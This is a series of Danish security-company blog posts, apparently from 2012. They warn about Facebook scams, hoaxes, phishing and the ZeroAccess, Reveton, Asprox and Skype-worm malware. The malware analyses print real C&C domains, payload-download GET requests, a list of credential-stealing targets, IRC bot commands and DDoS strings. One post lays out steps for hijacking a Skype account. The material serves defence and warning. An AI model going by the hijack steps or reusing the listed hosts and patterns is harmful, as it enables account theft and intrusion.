"Bliv testkører og få gratis Volvo, benzin og forsikring i 30 dage."

Sådan lyder et tilbud på Facebook. Hvis du synes det lyder lokkende, så vent lige en gang med at klikke og læs videre.

Konkurrencen udbydes af Orville Media (orville.dk) og man skal naturligvis i gennem et hav af spørgsmål, der intet har med Volvo, biler eller trafik overhovedet at gøre, men kun er et spørgsmål om, hvor meget spam fra deres samarbejdepartnere de kan komme til at sende i hovedet på deltageren. Spam = penge i lommen på Orville.

Blandt andet kan man af flere omgange risikere at havne i kløerne på et firma, bosidende i Tallinn, Estland, der tilbyder abonnementer på forskellige sundhedsprodukter. Vi forudser, at det kan give nogle udfordringer i forbindelse med returnering af uønskede varer.

Partnere

Du kan blive kontaktet telefonisk af undersøgelsens partnere som er:

Det med småt

Konkurrencebetingelserne kan læses her.

Som altid opfordrer vi til ikke at lade sig friste af disse tilbud men der imod anmelde disse reklamer som spam til Facebook.

Vi bringer et lille udpluk af, hvad der venter deltagerne i denne survey. I sær overskriften "Besvar spørgsmålene så vi kan se om du passer til den testprofil vi søger" siger alt. Det er jo indlysende, hvordan barbervaner, strikning, historiske bøger, undertøj, gossip, helbred og spændinger i kroppen kan have noget med testkørsel af 3 nye biltyper at gøre.

Som en lille finale får deltageren - som en tak fordi du gad at fodre os med dine personlige oplysninger og vaner - lov til at vælge en ny survey at deltage i.

Endnu en gang er der kædebreve der truer med virus og ødelæggelse i omløb på Facebook. Der er tale om en hoax/kædebrev hvis eneste formål er at skabe støj og unødig bekymring. Det er fup og disse beskeder bør slettes med uddannelse til afsenderen om at der er tale om et kædebrev.

Vi har i denne uge observeret to forskellige kædebreve blive delt blandt masser af Facebook brugere:

"ADVARSEL VIGTIGE!!! Cirkulere dette budskab til venner, familie og kontakter!
I de kommende dage: Åbn ikke nogen meddelelse med en vedhæftet fil, der hedder arkiv (Windows Live) uanset hvem der sender. Det er en virus, der brænde hele harddisken. Denne virus kommer fra en kendt person, som du har i din adresseliste, du skal sende meddelelsen til alle dine kontaktpersoner. Hvis du har et t meddelelse kaldet: "Opdater Windows Live", ikke åbne det! Dette er den værste virus bebudet af CNN. Der har ifølge Microsoft mest destruktive virus nogensinde eksisteret.

Dette virus blev opdaget i går eftermiddags af McAfee og der er ingen chance for reparation for denne type virus ødelægger simpelthen sektor nul fra harddisken. Blot kopiere og indsætte"

mens den anden spiller på "risikoen" for at blotte følsomme data på tidslinjen. Den spredes med følgende ordlyd:

"HUSK AT TJEKKE DIN TIDSLINJE:
Efter FB har lavet om for nylig, er der flere personer som har fået nogle af de personlige mails ud på deres tidslinje.
Hvis man med jævne mellemrum sletter sine mails, slipper man for at andre pludselig kan se de (måske pinlige, hvad ved jeg) mails, som var stilet personligt - Kopier og del MEGET gerne denne besked."

Hvad er der fælles for disse to advarsler/kædebreve?
1) De er begge baseret på falske oplysninger
2) de skræmmer for at blive læst og "taget alvorligt"
3) de beder dig om at sende beskeden videre til venner og bekendte

Hvad gør man med hoaxes/kædebreve?
Man sletter dem og uddanner afsenderen om hvordan man spotter et kædebrev! Tak.

En ny såkaldt "Clickjacking" (http://en.wikipedia.org/wiki/Clickjacking) kampagne er i omløb på Facebook. Der anvendes den traditionelle lokkemad, hvor en sensationel video skal tiltrække sig Facebook brugerens nysgerrighed.

I dette tilfælde lokkes med titlen "Amazing Baby Born [Video] !!!". Se billede herunder, som vi har tilladt os at sløre.


Et klik på det pågældende link, som postes til venner og bekendtes Facebook væg, flytter brugeren væk fra Facebook og ind på websiden teenagerpost.net. På denne webside anvendes overlappende grafiske elementer med det formål, at knappen "afspil" faktisk er "Like" knappen. Et klik, og man liker/synes godt om den pågældende kampagne, hvorved denne spredes viralt.

CSIS har blokeret det pågældende domæne i CSIS Secure DNS hvorved der også opnås beskyttelse for Heimdal Pro og Corporate kunder.

Formålet med kampagnen er primært at levere reklamer og links der peger mod tvivlsomme websider, herunder konkurrencer og quizzer der skal lokke til at naive brugere opgiver følsomme personlige oplysninger.

Fra d. 1. oktober 2012 har CSIS Security Group A/S udnævnt Allan Mortensen som ny administrerende direktør i virksomheden. Allan Mortensen kommer fra en stilling som Country Manager for den danske og svenske afdeling af sikkerhedsselskabet Checkpoint Systems A/S,

Den tidligere direktør og medstifter af CSIS, Morten Villekjær, glædes over samarbejdet og ser frem til den kommende tid:

”Allan er en stor gevinst for CSIS. Han har allerede bevist, at han er stærk til både den strategiske tænkning og den konkrete implementering. Vi tror på, at han er den rette mand til at lede forandringer og skabe vækst i et marked, der er i heftig udvikling.”

Allan Mortensen har 30 års erfaring med salg og virksomhedsledelse hos organisationer som AT&T, NCR, Telia og altså senest som frontløber for Checkpoint Systems A/S siden 2005. Allan Mortensen ser frem til at videreudvikle CSIS:

”Danmark og hele verden står overfor nogle markante it-sikkerhedsmæssige udfordringer den kommende tid. Så sent som i weekenden oplevede Sverige for en kort stund hackernetværket Anonymous, hvis aktiviteter vi fulgte fra sidelinjen. CSIS har de absolut mest kompetente medarbejdere og det bliver spændende at være med til at løfte virksomheden og udnytte dets kæmpe potentiale.”

CSIS Security Group A/S er et dansk selskab, grundlagt i 2003 med en mission om på bedst mulig vis at imødekomme og bekæmpe den stigende trussel, de IT-kriminelle udgør. I dag har CSIS udviklet sig til at blive Nordens førende leverandør af eCrime services, og samarbejder bl.a. med alle de danske banker, samt en række af de største europæiske pengeinstitutter.

Den viden, der opnås ved kontinuerligt at følge i de it-kriminelles fodspor, genanvendes til at udvikle løsninger, der yder optimal beskyttelse til organisationer såvel som privatpersoner. Heriblandt Heimdal, der er udbredt i 71 lande verden over, og dagligt sikrer bl.a. brugernes netbank og færden på nettet.

Det farlige rootkit, ZeroAccess, inficerer mere end 30.000 maskiner i Danmark. CSIS har udviklet et gratis detektionsværktøj, der kan bruges til at afgøre, om din maskine er blandt de mange inficerede maskiner. Værktøjet findes her: https://www.csis.dk/da/private/zeroaccess/.

Kliksnyd, PPI og bagdør
ZeroAccess, som er et avanceret kernel rootkit, der bl.a. misbruges til at lave diverse former for Clickfraud (Kliksnyd), har ramt Danmark hårdt. Der er tale om et avanceret BOTnet redskab, der generer massevis af penge til bagmændene. Det sker igennem systematisk kliksnyd og "Pay Per Installs" (PPI). Udover at misbruge inficerede maskiner til kliksnyd og PPI, åbnes der også en bagdør på maskinen, der kan føre til uautoriseret fjernadgang og potentiel datalækage.

Navnet "ZeroAccess" stammer fra en streng fundet i den binære kode "f:VC5releaseZeroAccess.pdb". Denne referer sandsynligvis til den projektmappe hvorfra koden er blevet kompileret. ZeroAccess findes i flere end 50 varianter hvoraf den nyeste som er blevet skudt ud via det centrale BOTnet er fra sidste uge. Denne trussel er særdeles dynamisk. Når man først er blevet inficeret vil de it-kriminelle have alle muligheder for at opdatere den skadelige kode og derved undgå detektion men også tilføje ny funktionalitet.

Dette er sandsynligvis den største isolerede infektion af maskiner i Danmark siden netværksormen Conficker/Downadup. Vi har udarbejdet et billede, der viser, hvordan de mange infektioner er spredt geografisk over hele landet. En prik kan sagtens repræsentere flere maskiner, da de geografisk kan ligge "ovenpå hinanden".



Top 5 værst ramte ISP'ere
Illustrationen herunder viser de 5 ISP (Internet udbydere) i Danmark hvor der er registreret flest inficerede maskiner.


Bemærk, at det reele tal af registrerede infektioner kan variere grundet dynamisk IP adresse tildeling. Det er dog vejet op mod det forhold, at der kan være flere inficerede maskiner bag udstyr der NAT'er (http://da.wikipedia.org/wiki/Network_Address_Translation).

Vores Threat Detection kunder er netop nu ved at blev adviseret om infektionen.

Heimdal Pro og gratis detektionsværktøj
CSIS detekterer ZeroAccess i Heimdal Pro og Corporate og blokerer endvidere for dette rootkits mange domæner (C&C servere), som dannes løbende gennem en DGA (Domain Generating Algorithm), http://en.wikipedia.org/wiki/Domain_Generation_Algorithm. CSIS Secure DNS kunder vil kunne opdage infektioner der slår ud som "ZeroAccess" C&C servere.

CSIS vil i morgen (tirsdag) frigive et gratis detektionsværktøj, så man kan checke, om man er inficeret med ZeroAccess rootkittet. Værktøjet vil blive postet her på vores hjemmeside.

Beskyttelse mod ZeroAccess og andre BOTs!
Den mest effektive metode der findes, til at undgå at blive inficeret af denne type virus, er løbende at opdatere de programmer man har installeret på sin PC. Det er primært tredjepartsprogrammer, herunder Adobe Reader/Acrobat, Java JRE, Adobe Flash og sårbarheder i disse som udnyttes til at inficere Windows maskiner. Vi har set flere exploitkits levere ZeroAccess virussen, men mange infektioner stammer fra det kommercielle exploitkit Blackhole. De sårbarheder der udnyttes i Blackhole, og som fører til infektion, kan forhindres ved at bruge Heimdal Security Agent som tilmed er gratis for private brugere. Heimdal Security Agent kan hentes gratis her: https://www.heimdalagent.com/da/home. Heimdal Security Agent kører på alle supporterede versioner af Microsoft Windows og er det rigtige supplement til din Antivirus beskyttelse.

ZeroAccess rammer kun Windows
ZeroAccess inficerer udelukkende Microsoft Windows maskiner. Mac, Linux, og andre operativ systemer er ikke berørte af denne epidemi.

CSIS har udviklet et værktøj som kan køre på alle Microsoft Windows maskiner, og som kan anvendes til at identificere om man er inficeret af det rootkit som hedder "ZeroAccess". (Se også vores alarm: "Farligt rootkit invaderer Danmark" https://www.csis.dk/da/csis/news/3732/). Vi vurderer, at der rundt regnet befinder sig ca. 30,000 inficerede maskiner i Danmark.


ZeroAccess er et raffineret Windows rootkit som dels sluger Internet trafik, gør PC'en langsom, installerer utilsigtet software, og dels kan give ondsindede personer adgang til ens maskine igennem en bagdør. Det kan føre til tyveri af potentielt person følsomme oplysninger.

Denne infektion er uden sammenligning det mest omfattende virusudbrud siden Conficker/Downadup ormen spredte sig mellem sårbare Microsoft Windows maskiner i starten af 2009.

Værktøjet kan findes gratis på adressen:
https://www.csis.dk/da/private/zeroaccess/

Inficeret? Her kan du rense din maskine!
Hvis du skulle være så uheldig at være inficeret af ZeroAccess, så er der heldigvis hjælp forude. Vi anbefaler at du anvender et "rense værktøj", som løbende opdateres af vores venner fra ESET.

Værktøjet kan hentes på følgende adresse:
http://kb.eset.com/esetkb/index?page=content&id=SOLN2895

Vi tilbyder - i en begrænset periode - mulighed for at du kvit og frit, og helt uden binding, kan afprøve vores sikkerhedsprogram Heimdal Security Agent PRO.

Det eneste du skal gøre er at hente din license nøgle på vores webside ved at følgende dette link:

https://www.heimdalagent.com

Med Heimdal Security Agent i PRO versionen behøver du ikke længere frygte virus fra fjendtlige hjemmesider. Dem blokerer vi automatisk for dig!! Vi blokerer også for adgang til phishing og andet uønsket indhold. Med PRO udgaven får du endvidere adgang til vores malware motor der er i stand til at fange sofistikerede informations- og netbanktyve der normalt ikke fanges af antivirus software.

Heimdal Security Agent kan køre på alle versioner af Microsoft Windows og er et supplement til dit eksistrende antvirus eller sikkerhedsprodukt.

Værsgo, vi håber du vil syntes godt om Heimdal Security Agent PRO!

Det er lørdag morgen og it-kriminelle har vækket vores eCrime SOC (Security Operation Center) med en sværm af phishing e-mails.

Hele tre kampagner skudt i gang hen over natten og tidligt her lørdag morgen.

Kampagnerne misbruger henholdsvis NETS og Nordea navn. Herunder har vi samlet skærmpdumps af de uønskede e-mails.


Og så en sværm der foregiver at komme fra Nordea. Det er let at spotte at indholdet er robot oversat. Generelt fremstår disse uønskede e-mails meget uprofessionelt.

Og vi runder galleriet af med endnu en Nordea spammail som er spammet ud tidligt i morges: 



CSIS har initieret nedtagning af de uønskede websider, og har naturligvis blokeret dem i Heimdal Secure Agent PRO og Corporate samt vores kommercielle CSIS Secure DNS, som er rettet mod erhvervslivet.

Disse kampagner udspringer fra individer vi allerede har under efterforskning.

Vi anbefaler, at man sletter e-mails der foregiver at komme fra et pengeinstitut og som samtidig opfordrer til at videregive følsomme oplysninger.

Der er intet nyt ved denne kampagne, som misbruger NETS navn og logo, men ikke desto mindre er den massiv, og involverer flere end 100 forskellige domæner. Denne kampagne har samme styrke som den vi observerede i September og som tydeligvis udspringer fra samme gruppe som var på spil dengang.

Fra: Nets <nets-dk3@fw8.nets.eu>

Emne: ALERT! Vigtig meddelelse fra Nets - kunde-id: [vilkårligt ID]

Herunder et skærmdump af selve indholdet af phishing mailen:


CSIS har naturligvis allerede påbegyndt nedskydningen af de mange uønskede websider, og har samtidig løbende blokeret de mange domæner i CSIS Secure DNS, hvilket også betyder at beskyttelse også omfatter Heimdal PRO og Corporate kunder.

Er du blandt de uheldige danskere som er blevet taget som gidsel af den virus/malware, som hedder Reveton - og måske bedre kendt som Ukash virus?

Herunder følger anvisning til hvordan man slipper af med denne malware. Vi skal imidlertid understrege, at denne anvisning udelukkende gælder med henblik på at frigive de låste data. Vi anbefaler, at man formaterer og geninstallerer Windows hvis denne malware har været på maskinen. Det skyldes, at Reveton er direkte relateret til en endnu værre infektion kendt som "Citadel". Citadel er en avanceret netbank tyv, som detektes af Heimdal Pro og Corporate.

Vi har tidligere været ude med en advarsel omkring Reveton (https://www.csis.dk/da/csis/blog/3655/). Det var i midten af September måned. truslen er ikke blevet mindre og vi anbefaler alle at installere Heimdal som automatisk vil holde maskinen opdateret. Denne infektion skyldes at vigtige tredjepartsprogrammer (Java JRE, Adobe Reader, Flash) ikke har været forsvarligt opdaterede, hvorved en kompromitteret eller ondsindet webside har kunnet tvangsfodre maskinen med virus.

Reveton kan fjernes på flere måder.

1) Hent Malwarebytes Anti-Malware:
http://www.filehippo.com/download_malwarebytes_anti_malware/
(produktet findes i en gratis udgave som vil klare opgaven)

Opstart maskinen i fejlsikret tilstand med netværk. Man bringer maskinen i fejlsikret tilstand ved at trykke F8 under opstarten.

Sørg for at opdatere Malwarebytes Anti-Malware lige efter det er blevet installeret, og gennemfør herefter en "Full scan", slet de elementer der findes og er markeret som skadelig kode.

2) Dernæst for at afslutte processen skal man hente Hitman pro værktøjet som også er gratis: http://www.surfright.nl/en/hitmanpro/

Et alternativ, hvis ovenstående ikke fungerer, er at genstarte maskinen i fejlsikret tilstand og køre ESETs værktøj som kan hentes gratis på adressen:
http://kb.eset.com/esetkb/index?page=content&id=SOLN3035

Der findes en udemærket video på YouTube der for de mere tekniske kan anvendes som inspiration til fjernelse af Reveton.
http://www.youtube.com/watch?v=Qb8Rv0Xu60s

Vi skal afslutningsvis understrege, at denne malware opdateres jævnligt. Det er både med henblik på at omgå antivirus og vanskeliggøre rensning af maskinen. Men mindst ligeså vigtigt er det at geninstallere systemet efter at de kidnappede data er blevet frigivet og blevet sikkerhedskopieret til et andet medie. Når maskinen er blevet geninstalleret bør man hente Heimdal (https://www.heimdalagent.com) som er helt gratis for private brugere og som vil forhindre dette i at gentage sig.

På onsdag d. 31.10 afholder DI/TEK en dedikeret konference i København med titlen ”Sådan hacker man produkter- og produktionsapparater - og sådan beskytter du dem!”. Titlen indikerer samtidig, at der vil være fokus på SRO (Styring Regulering Overvågning), PLC (Programmable Logic Controller) og SCADA (Supervisory Control And Data Acquisition). Programmet for dagen kan ses her: http://di.dk/Virksomhed/Produktion/IT/Konference/Pages/Program.aspx

At det netop er SCADA systemer, der er fokus på ved denne konference, er ingenlunde tilfældigt! Vi ved at SCADA systemer og software til produkter- og produktionsapparater typisk anvender en forældet platform og ofte er udviklet for mange år siden. De kan derfor have nedarvet et utal af klassiske sikkerhedsdesignfejl fra dengang, hvor it-sikkerhed var knapt så meget i fokus, som den er idag. Som et indirekte resultat af dette var APT’en "Stuxnet", som saboterede uran-berigelsesprogrammet i Iran, et decideret paradigmneskift, idet denne malware, som den første af sin slags, netop angreb SCADA og PLC, hvorved den var i stand til at påvirke og manipulere hele den industrielle process.

SCADA software anvendes til at kontrollere processer hos kraft, el- og vandværker, militærinstallationer samt industrielle produktionssystemer. Også mange IHC (Intelligent House Control) interfaces som stilles til rådighed for derved – med stor brugervenlighed, at kunne styre og kontrollere lys, vand og sågar automatiske lukkemekanismer i alt fra sportshaller, indkøbscentre til forretningscentre og boligkomplekser, er i risiko for eksterne angreb.

CSIS er hovedsponsor ved denne konference. Vi er sponsorer fordi, at vi er fuldt opmærksomme på den trussel som dårligt sikrede systemer udgør for virksomheder, men også for hele infrastrukturen i Danmark. Vores bidrag på konference er at dokumentere hvor nemt det er at lokalisere SCADA interfaces. Vores research vil blive dokumenteret i et geografisk verdenskort der vil synliggøre, hvor mange potentielt sårbare systemer der findes. Vi lover at det vil blive hårrejsende.

Udokumenteret bagdør påvirker mange SCADA systemer
Derudover vil der være fokus på en frisk opdaget og hidtil ukendt bagdør, som befinder sig i industristyringssystemet CoDeSys. Bagdøren gør det muligt at opnå fuld adgang til styringssystemet uden forudgående bruger autentifikation. Bagdøren er bekræftet i både Windows CE og Linux-baserede systemer og der findes pt ikke en løsning på problemet fra producenten. CoDeSys er udviklet af 3S-Smart Software Solutions og er integreret i industrisystemer fra ikke færre end 221 forskellige leverandører. Mere information findes her: http://www.digitalbond.com/2012/10/25/new-project-basecamp-tools-for-codesys-200-vendors-affected/

Fuld program med link til tilmelding, kan findes på DI/DITEK’s hjemmeside:
http://di.dk/Virksomhed/Produktion/IT/Konference/Pages/Program.aspx

Dubex sikkerhedskonference
Allerede i morgen tirsdag d. 30.10. 2012 vil det være muligt at møde CSIS når vores forhandler, Dubex åbner dørene for ”Dubex Security & Risk Management Summit”. Her afholder Peter Kruse en keynote med titlen: ”Det skandinaviske trusselslandskab anno 2012”. Også her vil der blive givet praktiske eksempler på angrebsværktøjer, underground "Crime as a services", infektionsmønstre, og datalækager for Skandinavien.

Program samt tilmelding, som forørvigt er gratis, kan findes hos Dubex på adressen:
http://www.dubex.dk/summit2012/

Vores kollegaer fra Group-IB, som vi bl.a. arbejder tæt sammen med i European Cyber Security Federation (http://ecyfed.com/), har netop frigivet oplysninger om en frisk 0-dags sårbarhed, som befinder sig i alle nyere versioner af Adobe Reader herunder X/XI.

Sårbarheden er af typen 0-dag. Det vil sige, at Adobe fortsat arbejder på at producere en sikkerhedslap. Adobe Reader X/XI er blandt de mest populære tredjepartsprodukter i verden, og anvendes af millioner af slutbrugere. 

Denne sårbarhed kræver, i vores testlab, at ofret foretager en vis interaktion for at arbitrær kode kan afvikles - eksempelvis via klassisk drive-by tilgang. Det forudsætter bl.a. at man kan lokke et offer til at lukke Adobe Reader manuelt efter dialogboksen "do you want so save the changes?" er blevet vist. Det vil langt de fleste almindelige slutbrugere nok gøre, hvorfor vi finder denne sårbarhed yderst potent.

Exploitkoden vil altid indeholde følgende kritiske segment: "X 0 obj <</Pages Y 0 R  [shellkode] >> endobj Y 0 obj << >> endobj". Vi antager at dette kan anvendes til at detekte potentielt skadelige PDF dokumenter, som forsøger at misbruge denne svaghed.

CSIS er i besiddelse af komplet PoC (Proof of Concept) kode. En demo, som illustrerer sårbarheden i praktisk anvendelse, kan findes på Youtube:
http://www.youtube.com/watch?v=uGF8VDBkK0M

CSIS monitorerer denne udvikling tæt, og vi blokerer naturligvis potentielt fjendtlige websider i CSIS Secure DNS og Heimdal Security Agent Pro og Corporate.

Det har været en travl dag på kontoret. Vi har set flere spamkampagner blive skudt igang fra bl.a. Asprox BOTnettet og med forskelligt indhold. Et eksempel på en af de mere aggressive kampagner findes herunder:



Den vedhæftede fil, som modtageren skal lokkes til at åbne hedder "ACH_Report-CFA2FFEE94.pdf.zip". Zip-filen indeholder en binær kode, som ved kørsel vil inficere maskinen. Hvis man kigger i filegenskaberne opdager man hurtigt at bagmændene ikke er helt uden humor:

CompanyName
Weekfish
FileDescription
Weekfishtail
FileVersion
7.5.691.73
LegalCopyright
Copyright 
2012
InternalName
SpellMake
OriginalFilename
Food.exe
ProductName
WeekfishWell

Koden er udviklet i Visual C++, med følgende kompileringsdato: "Fri Nov 2 06:29:33 2012 UTC" og indeholder mange uønskede funktioner.

Ved kørsel vil den injekte sig i iexplore.exe processen: C:Documents and SettingsAdministratorApplication Datarapini.dll -> C:Program FilesInternet Exploreriexplore.exe, som den så anvender til at forbinde sig til en C&C server hvorfra der trækkes supplerende malware. DLL'en køres på systemet igennem en rundll der spawnes med følgende kald:

"rundll32.exe C:Documents and SettingsAdministratorApplication Datarapini.dll BuildNotificationPackage"

Den kopierer sig endvidere til systemet til følgende sti:
C:Documents and SettingsAdministratorApplication DataErypycpi.exe

I forbindelse med kommunikation med de centrale C&C servere blev følgende kontaktet af malwaren:

josemarmolclub.com.ar
aasamant.com
matheusilva.com
alispide.net
sanalturtr.com
rdquark.com
fundepalma.org

At der downloades supplerende malware kan dokumenteres med nedenstående (mellemrum indlagt af CSIS):

GET /hr5JHr1.exe HTTP/1.0
Host: fundepalma.org
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

GET /ttmX4XF.exe HTTP/1.0
Host: matheusilva.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

GET /V61zmw.exe HTTP/1.0
Host: alispide.net
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Det matcher meget godt funktionen, som også afsløres i den binære kode:


Denne kampagne har til formål at binde den inficerede maskine ind i et BOTnet og herfra systematisk udtrække sensitive oplysninger herunder FTP brugernavne og passwords:

SoftwareVanDykeSecureFX
IMAP User
nintendo
Yandex
SoftwareMicrosoftWindows NTCurrentVersionWindows Messaging SubsystemProfilesMicrosoft Outlook Internet Settings
WinFTP
PopServer
PopAccount
sites.xml
Login
POP3 User
SoftwareSotaFFFTPOptions
SoftwareBulletProof SoftwareBulletProof FTP ClientMain
MozillaSeaMonkey
fireFTPsites.dat 
FreshFTP
Pocomail
inetcomm server passwords
FTPList.db
Comodo
ServerName
SoftwareFTP ExplorerProfiles
SoftwareRITThe Bat!Users depot
ChromePlus
SoftwareFTPWareCOREFTPSites
GlobalSCAPECuteFTP Pro
[..]

C&C serverne, hvorfra der trækkes supplerende malware, er hardkodet i den binære kode:


Vi har blokeret for samtlige domæner i CSIS Secure DNS og yder derved også beskyttelse igennem Heimdal Security Agent PRO og Corporate.

Den skadelige kode opnår følgende antivirus detektion:

Antivirus    Result    Update
Agnitum     -     20121109
AhnLab-V3     Win-Trojan/Downloader.178688.O     20121109
AntiVir     TR/Bredo.EB.1     20121109
Antiy-AVL     -     20121108
Avast     -     20121109
AVG     -     20121109
BitDefender     -     20121109
ByteHero     -     20121107
CAT-QuickHeal     -     20121109
ClamAV     -     20121108
Commtouch     -     20121109
Comodo     -     20121109
DrWeb     Trojan.PWS.Stealer.946     20121109
Emsisoft     Trojan.Win32.Agent.AMN (A)     20121109
eSafe     -     20121107
ESET-NOD32     Win32/PSW.Agent.NTM     20121109
F-Prot     -     20121109
F-Secure     -     20121109
Fortinet     -     20121109
GData     -     20121109
Ikarus     Trojan-PWS.Win32.Tepfer     20121109
Jiangmin     -     20121109
K7AntiVirus     Trojan     20121109
Kaspersky     UDS:DangerousObject.Multi.Generic     20121109
Kingsoft     Win32.Malware.Generic.a.(kcloud)     20121105
McAfee     -     20121109
McAfee-GW-Edition     -     20121109
Microsoft     -     20121109
MicroWorld-eScan     -     20121109
Norman     -     20121108
nProtect     -     20121109
Panda     -     20121109
PCTools     Trojan.Fakeavlock     20121109
Rising     -     20121109
Sophos     Troj/Bredo-ADK     20121109
SUPERAntiSpyware     -     20121109
Symantec     Trojan.Fakeavlock     20121109
TheHacker     -     20121107
TotalDefense     -     20121108
TrendMicro     -     20121109
TrendMicro-HouseCall     TSPY_ZBOT.GEL     20121109
VBA32     -     20121109
VIPRE     -     20121109
ViRobot     -     20121109

En yderst alvorlig designfejl i Skype gør det muligt for enhver at hijacke en andens konto.

Dette er ikke alene en kritisk designfejl, som gør det muligt at stjæle en anden brugers Skype konto, det er også et alvorligt privacy issue. Efter en konto er blevet hijacket er det muligt at opnå adgang til hele "Chat historikken". Det forudsætter "kun" at ofret er online på samme tid. Av!

Der er her tale om en yderst alvorlig designfejl i Skype. Detaljer omkring hvordan denne fejl fungerer deles flittigt og hovedparten af de kilder vi har observeret, peger alle på en post på et Russisk forum som kilden til denne offentliggørelse: http://habrahabr.ru/post/158545/

En dansk translation findes herunder:

1) Tilmeld dig en ny Skype konto. Anvend dit offers e-mail i forbindelse med registreringen. En advarsel vil fremkomme der fortæller at den pågældende e-mail adresse allerede er i brug men processen for registrering stoppes ikke.

2) Log i via Skype klienten på din netop oprettede konto

3) Lav en anmoding via funktionen "reset password/nulstil password" https://login.skype.com/account/password-reset-request med ofrets e-mail adresse

4) Du vil herefter modtage en notifikation.


Ved at klikke på dette link kan man opnå adgang til ofrets konto og nulstille passwordet.

Den eneste løsning netop nu, mens Microsoft arbejder på en mere holdbar af slagsen, er at ændre sin Skype konto e-mail adresse til en som ikke er offentligt kendt.

En post, der ligesom ovenstående, beskriver hvordan man i seks trin kan hijacke en Skype konto, findes på følgende adresse: http://pixus-ru.blogspot.dk/2012/11/hack-any-skype-account-in-6-easy-steps.html

NB: Hullet er blevet lukket af Microsoft!

En "orm" spreder sig for øjeblikket via Skype. Den har inkluderet et dansk sprog modul der gør den i stand til at tale "dansk".

Den spreder sig med følgende ordlyd (mellemrum indlagt af CSIS):

”ggggg du ser vanvittigt på dette billede http://g oo.gl/AVzL8?img=[%skype navn%]”

Hvis en Skype bruger vælger at klikke på det medfølgende link hentes den skadelige komponent via "sendspace". Bemærk, at der anvendes mange forskellige URLs til formålet. Trafikmønster findes herunder:

http://go o.gl/AVzL8
--> http://www.send space.com/pro/dl/m02hjf
--> "foto 18.11.2012 profile.zip" -->
foto 18.11.2012 profile.exe (MD5: b93a552918f5c1d4dda49bd58db3dd49)


Vi kan se at denne kode allerede har opnået en pæn udbredelse i Europa med flere end 2000 kliks alene fra Danmark.




Hvis den pågældende zip fil udpakkes og køres vil denne malware kopiere sig til harddisken:

C:Users[%brugerkonto%]AppDataRoamingHgasaz.exe
C:Users[%brugerkonto%]AppDataRoaming4BC7.exe

Den pågældende sti er statisk og bestemmes via "SHGetSpecialFolderPathW".

Når vi kigger på hovedkomponenten står det hurtigt klar at denne malware er yderst frisk: [Mon Nov 19 04:07:37 2012 UTC]. Den injekter sig ved kørsel i iexplore.exe processen:

004068C6    push 00411728h    UTF-16 "Internet Exploreriexplore.exe" xref: 004068C3
004068CB    push 00449E78h    UTF-16 "C:Program Files (x86)Internet Exploreriexplore.exe"
004068D0    call dword ptr [00411240h]    PathAppendW@SHLWAPI.DLL (Import)
004068D6    mov eax, 00449E78h    UTF-16 "C:Program Files (x86)Internet Exploreriexplore.exe"
004068DB    ret     function end 

Der downloades supplerende malware via en HTTP GET som defineres igennem en IRC kanal:

GET /dl/179970419/a8fcb14/0028492385y34857.html HTTP/1.1
User-Agent: Mozilla/4.0
Host: hotfile.com

GET /get/3a3d254720f0d0c9ecbf8cf42a98c15eb4f31bfc/50a9f9f4/2/2a5febb05141e137/aba2173/0028492385y34857 HTTP/1.1
User-Agent: Mozilla/4.0
Host: s149.hotfile.com
Connection: Keep-Alive
Cookie: ip=77.87

HTTP/1.1 200 OK
Server: Hotfile Server v0.2
Date: Mon, 19 Nov 2012 09:20:54 GMT
Content-Type: application/octet-stream
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 55296
Content-Disposition: attachment; filename="0028492385y34857"
Content-Transfer-Encoding: binary
Connection: close

Som tidligere nævnt anvender denne malware en IRC server til C&C funktioner (den aktuelle findes på "photobeat.su", men vi har blokeret flere i CSIS Secure DNS):

!j -c BE,DK,FI,FR,GR,HR,HU,IE,NO,PL,RO,SK #gi
Channel: #gi
* Topic for #gi is: !dl http://hotfile.com/dl/[unikt id]

En af funktionerne i denne kode er at kunne igangsætte DDoS angreb mod definerede mål.

push 00415E8Ch    ASCII "[UDP]: Starting flood on "%s:%d" for %d second(s)"

push 00415EC0h    ASCII "[UDP]: Finished flood on "%s:%d"

Det pågældende modul til DDoS ser ud til at være baseret på "Slowloris":

{sl0wl0riS}- Started fl00ding! "%s" FOR %d MinUt3{s}, va: 00415E30
[Slowloris]: Finished flood on "%s", va: 00415E68

Denne "orm" indeholder endvidere en selvbeskyttende funktion som genoptager processen såfremt den dræbes "%s.Protect "%s" against file removal done!!"

Antivirus detektion er ikke eksisterende:

Agnitum     -     20121116
AntiVir     -     20121116
Antiy-AVL     -     20121116
Avast     -     20121116
AVG     -     20121115
BitDefender     -     20121116
CAT-QuickHeal     -     20121116
ClamAV     -     20121115
Commtouch     -     20121116
Comodo     -     20121116
DrWeb     -     20121116
Emsisoft     -     20121116
eSafe     -     20121115
ESET-NOD32     -     20121116
F-Prot     -     20121116
F-Secure     -     20121116
Fortinet     -     20121116
GData     -     20121116
Ikarus     -     20121116
Jiangmin     -     20121116
K7AntiVirus     -     20121115
Kaspersky     -     20121116
Kingsoft     -     20121112
McAfee     -     20121116
McAfee-GW-Edition     -     20121116
Microsoft     -     20121116
MicroWorld-eScan     -     20121116
Norman     -     20121116
nProtect     -     20121116
Panda     -     20121116
PCTools     -     20121116
Rising     -     20121116
Sophos     -     20121116
SUPERAntiSpyware     -     20121116
Symantec     WS.Reputation.1     20121116
TheHacker     -     20121113
TotalDefense     -     20121115
TrendMicro     -     20121116
TrendMicro-HouseCall     -     20121116
VBA32     -     20121115
VIPRE     -     20121116
ViRobot     -     20121116

Er den computer du køber nu også helt ny og aldrig brugt?

Wupti præsenterer sig selv på deres hjemmeside på følgende måde:

”Danmarks største onlinehandel. Med omkring 10.000 varenumre i sortimentet er wupti.com Danmarks største onlinehandel for salg af forbrugerelektronik og hårde hvidevarer”.

Vi går mod vinteren, mørke aftener og juletid, og der skal traditionen tro købes både bærbare- og stationære PC'ere til de danske hjem.

